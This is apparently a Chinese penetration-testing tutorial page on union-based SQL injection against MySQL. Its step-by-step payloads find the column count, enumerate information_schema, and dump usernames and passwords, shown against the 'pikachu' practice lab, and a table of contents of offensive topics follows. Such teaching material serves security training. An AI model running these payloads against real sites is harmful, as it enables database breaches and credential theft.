## 注入攻擊的攻擊手法
主要有:聯合查詢(union)注入、布爾盲注(base on boolian)、時間盲注(base on time)、報錯信息注入、寬字節注入、偏移注入等。
## 聯合查詢(union)注入
所謂聯合查詢注入即是使用union合并**兩個或多個**SELECT語句的結果集,第二個語句中就包含我們想要查詢的語句
```SQL
# payload
a' union select database(),user(),version() #%
```
### 先使用order by確定字段個數
**union 操作符一般與 order by 語句配合使用來確定可以查詢的字段個數**
>因為查詢的字段不能超過主查詢的字段,可以先在 SQL 語句后面加 order by 進行排序,通過報錯內容確定到底有幾個字段可供使用
~~~sql
#采用二分法找到最大的可排序列,即是可查詢的字段個數
a' order by 4 #%
# 假定最后4不報錯,5報錯,則可確定有4個字段,payload可以這樣
a' union select database(),user(),version(),4 #%
# 如果第二個字段才能顯示在屏幕上,那么payload需這樣湊成四個字段
a' union select 1,username,3,4 from user #%
~~~
## information_schema 注入
information_schema數據庫是MySQL5.0及以上系統自帶的數據庫。其中保存著關于MySQL服務器所維護的所有其他數據庫的信息。
如果我們用于注入的賬號,有能夠讀取該庫的權限,那么我們離脫褲就非常非常近了
### information_schema中的常用表
~~~sql
information_schema.tables #該庫中保存其他庫表名字的表
table_schema #上表中,保存庫名的列
table_name #上表中,保存表名的列
information_schema.columns #改表中保存每個表的列名
table_name #上表中,保存表名的列
column_name #上表中,保存列名的列
~~~
### 一次完整的拆解獲取過程
按照數據庫的庫-表-字段這個層次性進行一步步滲透
~~~sql
#1 先通過union找出數據庫的名稱
a' union select database(),user(),3 #%
#2 得到要爆破的數據庫名pikachu后,獲取相關表名
u' union select table_schema ,table_name,3 from information_schema.tables where table_schema='pikachu' #%
#3 獲取表名后,查詢columns表獲取字段名
k' union select table_name,column_name,3 from information_schema.columns where table_name='users' #%
#4 最后通過具體表獲取相關數據
kobe 'union select username ,password,3 from users #%
~~~
- src導航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查詢
- 備案信息查詢
- 信用信息查詢
- IP反查站點的站
- 瀏覽器插件
- 收集子域名信息
- 在線平臺
- 工具枚舉
- ssl與證書透明度
- DNS歷史解析
- DNS域傳送漏洞
- C段探測
- JS文件域名&ip探測
- 搜索引擎&情報社區
- google黑客
- 威脅情報
- 鐘馗之眼
- 收集相關應用信息
- 微信公眾號&微博
- APP收集&反編譯
- 收集常用端口信息
- 常見端口&解析&總結
- 掃描工具
- 網絡空間引擎搜索
- 瀏覽器插件
- nmap掃描
- 收集敏感信息
- 源碼泄露
- 郵箱信息收集
- 備份文件泄露
- 目錄&后臺掃描
- 公網網盤
- 歷史資產
- 指紋&WAF&CDN識別
- 指紋識別
- CDN識別
- 繞過CDN查找真實IP
- WAF識別
- 漏洞資源和社工
- 漏洞公共資源庫
- 社會工程
- 資產梳理
- 各種對滲透有幫助的平臺
- 掃描器
- 掃描器對比
- AppScan(IBM)_web和系統
- AWVS_web掃描
- X-Scan_系統掃描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_綠盟_web
- 安恒明鑒
- Nessus_系統
- nexpose_系統
- 啟明天鏡_web_系統
- SQL注入
- 常用函數
- sql注入步驟
- union注入和information_schema庫
- 函數和報錯注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解決方案
- Access數據庫注入
- MSSQL數據庫注入
- MYSQL數據庫注入
- 神器SQLmap
- xss跨站腳本攻擊
- xss原理和分類
- xss案例和修復
- xss繞過技巧
- xss案例
- 文件上傳下載包含
- 常有用文件路徑
- 文件上傳漏洞
- 文件下載漏洞
- 文件包含漏洞
- upload-labs上傳漏洞練習
- XXE、SSRF、CSRF
- SSRF原理基礎
- SSRF案例實戰
- CSRF原理基礎
- CSRF案例及防范
- XXE之XML_DTD基礎
- XXE之payload與修復
- XXE結合SSRF
- 遠程命令執行與反序列化
- 遠程命令和代碼執行漏洞
- 反序列化漏洞
- 驗證碼與暴力破解
- 爆破與驗證碼原理
- CS架構暴力破解
- BS架構暴力破解
- WEB編輯器漏洞
- 編輯器漏洞基礎
- Ewebeditor編輯器
- FCKeditor編輯器
- 其他編輯器
- web中間件漏洞
- 中間件解析漏洞
- Tomcat常見的漏洞總結
- Jboss漏洞利用總結
- Weblogic漏洞利用總結
- WEB具體步驟
- 旁注和越權
- CDN繞過
- 越權與邏輯漏洞
- WEB應用常見其他漏洞
- WEB登陸頁面滲透思路
- 獲取WEBshell思路
- 社工、釣魚、apt
- 社工和信息收集
- 域名欺騙
- 釣魚郵件
- 一些釣魚用的掛馬工具
- 代碼審計
- 代碼審計工具
- WAF繞過
- WAF基礎及云WAF
- 各種WAF繞過方法
- 繞過WAF上傳文件
- 系統提權
- windows系統提權
- linux系統提權
- 數據庫提權操作系統
- 內網橫向滲透
- 內網穿透方式
- 一些內網第三方應用提權
- ARP與DOS
- ARP欺騙
- DOS與DDOS
- 一些DOS工具